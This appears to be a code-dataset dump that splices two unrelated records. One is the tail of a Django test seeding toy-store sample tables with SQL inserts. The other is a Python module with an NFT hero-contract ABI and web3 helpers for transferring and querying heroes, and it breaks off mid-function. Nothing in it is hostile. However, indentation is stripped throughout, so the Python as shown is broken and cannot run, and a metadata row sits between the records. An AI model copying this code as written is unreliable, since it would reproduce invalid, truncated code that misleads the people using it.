VALUES('1000000005', 'The Toy Store', '4545 53rd Street', 'Chicago', 'IL', '54545', 'USA', 'Kim Howard');")
# Populate Vendors table
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRS01','Bears R Us','123 Main Street','Bear Town','MI','44444', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRE02','Bear Emporium','500 Park Street','Anytown','OH','44333', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('DLL01','Doll House Inc.','555 High Street','Dollsville','CA','99999', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FRB01','Furball Inc.','1000 5th Avenue','New York','NY','11111', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FNG01','Fun and Games','42 Galaxy Road','London', NULL,'N16 6PS', 'England');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('JTS01','Jouets et ours','1 Rue Amusement','Paris', NULL,'45678', 'France');")
# Populate Products table
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR01', 'BRS01', '8 inch teddy bear', 5.99, '8 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR02', 'BRS01', '12 inch teddy bear', 8.99, '12 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR03', 'BRS01', '18 inch teddy bear', 11.99, '18 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG01', 'DLL01', 'Fish bean bag toy', 3.49, 'Fish bean bag toy, complete with bean bag worms with which to feed it');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG02', 'DLL01', 'Bird bean bag toy', 3.49, 'Bird bean bag toy, eggs are not included');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG03', 'DLL01', 'Rabbit bean bag toy', 3.49, 'Rabbit bean bag toy, comes with bean bag carrots');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RGAN01', 'DLL01', 'Raggedy Ann', 4.99, '18 inch Raggedy Ann doll');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL01', 'FNG01', 'King doll', 9.49, '12 inch king doll with royal garments and crown');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL02', 'FNG01', 'Queen doll', 9.49, '12 inch queen doll with royal garments and crown');")
# Populate Orders table
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20005, '2020-05-01', '1000000001');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20006, '2020-01-12', '1000000003');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20007, '2020-01-30', '1000000004');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20008, '2020-02-03', '1000000005');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20009, '2020-02-08', '1000000001');")
# Populate OrderItems table
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 1, 'BR01', 100, 5.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 2, 'BR03', 100, 10.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 1, 'BR01', 20, 5.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 2, 'BR02', 10, 8.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 3, 'BR03', 10, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 1, 'BR03', 50, 11.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 2, 'BNBG01', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 3, 'BNBG02', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 4, 'BNBG03', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 5, 'RGAN01', 50, 4.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 1, 'RGAN01', 5, 4.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 2, 'BR03', 5, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 3, 'BNBG01', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 4, 'BNBG02', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 5, 'BNBG03', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 1, 'BNBG01', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 2, 'BNBG02', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 3, 'BNBG03', 250, 2.49);")
def tearDown(self):
        # Clean up after every test method.
Customers.objects.all().delete()
Vendors.objects.all().delete()
Orders.objects.all().delete()
OrderItems.objects.all().delete()
Products.objects.all().delete()
def test_customers(self):
for i in Customers.objects.all():
print(i.to_dict())
for i in Vendors.objects.all():
print(i.to_dict())
for i in Orders.objects.all():
print(i.to_dict())
for i in OrderItems.objects.all():
print(i.to_dict())
for i in Products.objects.all():
print(i.to_dict()) | [((16, 17, 16, 36), 'django.db.connection.cursor', 'connection.cursor', ({}, {}), '()', False, 'from django.db import connection\n')] |
tmfds/dfk | hero/hero.py | 91b6f95a4630b57deecf87cf4850b6576646c7d1 | import copy
from web3 import Web3
from .utils import utils as hero_utils
CONTRACT_ADDRESS = '0x5f753dcdf9b1ad9aabc1346614d1f4746fd6ce5c'
ABI = """
[
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"heroId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"summonerId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"assistantId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"statGenes","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"visualGenes","type":"uint256"}],"name":"HeroSummoned","type":"event"},
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},
{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"HERO_MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MINTER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"PAUSER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint256","name":"_statGenes","type":"uint256"},{"internalType":"uint256","name":"_visualGenes","type":"uint256"},
{"internalType":"enum IHeroTypes.Rarity","name":"_rarity","type":"uint8"},
{"internalType":"bool","name":"_shiny","type":"bool"},{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint256","name":"createdBlock","type":"uint256"},{"internalType":"uint256","name":"heroId","type":"uint256"},{"internalType":"uint8","name":"summonerTears","type":"uint8"},{"internalType":"uint8","name":"assistantTears","type":"uint8"},{"internalType":"address","name":"bonusItem","type":"address"},{"internalType":"uint32","name":"maxSummons","type":"uint32"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"}],"internalType":"struct ICrystalTypes.HeroCrystal","name":"_crystal","type":"tuple"}],"name":"createHero","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"_id","type":"uint256"}],"name":"getHero","outputs":[{"components":[{"internalType":"uint256","name":"id","type":"uint256"},{"components":[{"internalType":"uint256","name":"summonedTime","type":"uint256"},{"internalType":"uint256","name":"nextSummonTime","type":"uint256"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint32","name":"summons","type":"uint32"},{"internalType":"uint32","name":"maxSummons","type":"uint32"}],"internalType":"struct IHeroTypes.SummoningInfo","name":"summoningInfo","type":"tuple"},{"components":[{"internalType":"uint256","name":"statGenes","type":"uint256"},{"internalType":"uint256","name":"visualGenes","type":"uint256"},{"internalType":"enum IHeroTypes.Rarity","name":"rarity","type":"uint8"},{"internalType":"bool","name":"shiny","type":"bool"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"},{"internalType":"uint8","name":"class","type":"uint8"},{"internalType":"uint8","name":"subClass","type":"uint8"}],"internalType":"struct IHeroTypes.HeroInfo","name":"info","type":"tuple"},{"components":[{"internalType":"uint256","name":"staminaFullAt","type":"uint256"},{"internalType":"uint256","name":"hpFullAt","type":"uint256"},{"internalType":"uint256","name":"mpFullAt","type":"uint256"},{"internalType":"uint16","name":"level","type":"uint16"},{"internalType":"uint64","name":"xp","type":"uint64"},{"internalType":"address","name":"currentQuest","type":"address"},{"internalType":"uint8","name":"sp","type":"uint8"},{"internalType":"enum IHeroTypes.HeroStatus","name":"status","type":"uint8"}],"internalType":"struct IHeroTypes.HeroState","name":"state","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hp","type":"uint16"},{"internalType":"uint16","name":"mp","type":"uint16"},{"internalType":"uint16","name":"stamina","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStats","name":"stats","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct 
IHeroTypes.HeroStatGrowth","name":"primaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"secondaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"mining","type":"uint16"},{"internalType":"uint16","name":"gardening","type":"uint16"},{"internalType":"uint16","name":"foraging","type":"uint16"},{"internalType":"uint16","name":"fishing","type":"uint16"}],"internalType":"struct IHeroTypes.HeroProfessions","name":"professions","type":"tuple"}],"internalType":"struct IHeroTypes.Hero","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"getUserHeroes","outputs":[{"internalType":"uint256[]","name":"","type":"uint256[]"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"string","name":"_url","type":"string"},{"internalType":"address","name":"_statScienceAddress","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"string","name":"baseTokenURI","type":"string"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_statScienceAddress","type":"address"}],"name":"setStatScienceAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"components":[{"internalType":"uint256","name":"id","type":"uint256"},{"components":[{"internalType":"uint256","name":"summonedTime","type":"uint256"},{"internalType":"uint256","name":"nextSummonTime","type":"uint256"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint32","name":"summons","type":"uint32"},{"internalType":"uint32","name":"maxSummons","type":"uint32"}],"internalType":"struct IHeroTypes.SummoningInfo","name":"summoningInfo","type":"tuple"},{"components":[{"internalType":"uint256","name":"statGenes","type":"uint256"},{"internalType":"uint256","name":"visualGenes","type":"uint256"},{"internalType":"enum IHeroTypes.Rarity","name":"rarity","type":"uint8"},{"internalType":"bool","name":"shiny","type":"bool"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"},{"internalType":"uint8","name":"class","type":"uint8"},{"internalType":"uint8","name":"subClass","type":"uint8"}],"internalType":"struct IHeroTypes.HeroInfo","name":"info","type":"tuple"},{"components":[{"internalType":"uint256","name":"staminaFullAt","type":"uint256"},{"internalType":"uint256","name":"hpFullAt","type":"uint256"},{"internalType":"uint256","name":"mpFullAt","type":"uint256"},{"internalType":"uint16","name":"level","type":"uint16"},{"internalType":"uint64","name":"xp","type":"uint64"},{"internalType":"address","name":"currentQuest","type":"address"},{"internalType":"uint8","name":"sp","type":"uint8"},{"internalType":"enum IHeroTypes.HeroStatus","name":"status","type":"uint8"}],"internalType":"struct IHeroTypes.HeroState","name":"state","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hp","type":"uint16"},{"internalType":"uint16","name":"mp","type":"uint16"},{"internalType":"uint16","name":"stamina","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStats","name":"stats","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct 
IHeroTypes.HeroStatGrowth","name":"primaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"secondaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"mining","type":"uint16"},{"internalType":"uint16","name":"gardening","type":"uint16"},{"internalType":"uint16","name":"foraging","type":"uint16"},{"internalType":"uint16","name":"fishing","type":"uint16"}],"internalType":"struct IHeroTypes.HeroProfessions","name":"professions","type":"tuple"}],"internalType":"struct IHeroTypes.Hero","name":"_hero","type":"tuple"}],"name":"updateHero","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"userHeroes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}
]
"""
def block_explorer_link(txid):
return 'https://explorer.harmony.one/tx/' + str(txid)
def transfer(hero_id, owner_private_key, owner_nonce, receiver_address, gas_price_gwei, rpc_address, logger):
w3 = Web3(Web3.HTTPProvider(rpc_address))
account = w3.eth.account.privateKeyToAccount(owner_private_key)
w3.eth.default_account = account.address
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
owner = contract.functions.ownerOf(hero_id).call()
logger.info("Hero's owner " + str(owner))
if owner != account.address:
raise Exception("Owner mismatch")
tx = contract.functions.transferFrom(owner, receiver_address, hero_id).buildTransaction(
{'gasPrice': w3.toWei(gas_price_gwei, 'gwei'), 'nonce': owner_nonce})
logger.debug("Signing transaction")
signed_tx = w3.eth.account.sign_transaction(tx, private_key=owner_private_key)
logger.debug("Sending transaction " + str(tx))
ret = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
logger.debug("Transaction successfully sent !")
logger.info("Waiting for transaction " + block_explorer_link(signed_tx.hash.hex()) + " to be mined")
tx_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash=signed_tx.hash, timeout=24 * 3600,
poll_latency=3)
logger.info("Transaction mined !")
logger.info(str(tx_receipt))
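

# A hedged usage sketch (not part of the original module). The RPC URL, key
# and addresses below are placeholders; the nonce must be the sender's current
# transaction count. Old-style web3 names are used to match the calls above:
#
#   w3 = Web3(Web3.HTTPProvider("https://api.harmony.one"))
#   nonce = w3.eth.getTransactionCount(my_address)  # 'my_address' is hypothetical
#   transfer(hero_id=12345, owner_private_key=my_key, owner_nonce=nonce,
#            receiver_address=friend_address, gas_price_gwei=35,
#            rpc_address="https://api.harmony.one", logger=my_logger)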
def get_owner(hero_id, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
return str(contract.functions.ownerOf(hero_id).call())
def get_users_heroes(user_address, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
return contract.functions.getUserHeroes(Web3.toChecksumAddress(user_address)).call()
def is_approved_for_all(owner, operator, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
return contract.functions.isApprovedForAll(Web3.toChecksumAddress(owner), Web3.toChecksumAddress(operator)).call()
def get_hero(hero_id, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
contract_entry = contract.functions.getHero(hero_id).call()
hero = {}
tuple_index = 0
hero['id'] = contract_entry[tuple_index]
tuple_index = tuple_index + 1
# SummoningInfo
summoning_info = {}
summoning_info['summonedTime'] = contract_entry[tuple_index][0]
summoning_info['nextSummonTime'] = contract_entry[tuple_index][1]
summoning_info['summonerId'] = contract_entry[tuple_index][2]
summoning_info['assistantId'] = contract_entry[tuple_index][3]
summoning_info['summons'] = contract_entry[tuple_index][4]
summoning_info['maxSummons'] = contract_entry[tuple_index][5]
hero['summoningInfo'] = summoning_info
tuple_index = tuple_index + 1
# HeroInfo
hero_info = {}
hero_info['statGenes'] = contract_entry[tuple_index][0]
hero_info['visualGenes'] = contract_entry[tuple_index][1]
hero_info['rarity'] = contract_entry[tuple_index][2]
hero_info['shiny'] = contract_entry[tuple_index][3]
hero_info['generation'] = contract_entry[tuple_index][4]
hero_info['firstName'] = contract_entry[tuple_index][5]
hero_info['lastName'] = contract_entry[tuple_index][6]
hero_info['shinyStyle'] = contract_entry[tuple_index][7]
hero_info['class'] = contract_entry[tuple_index][8]
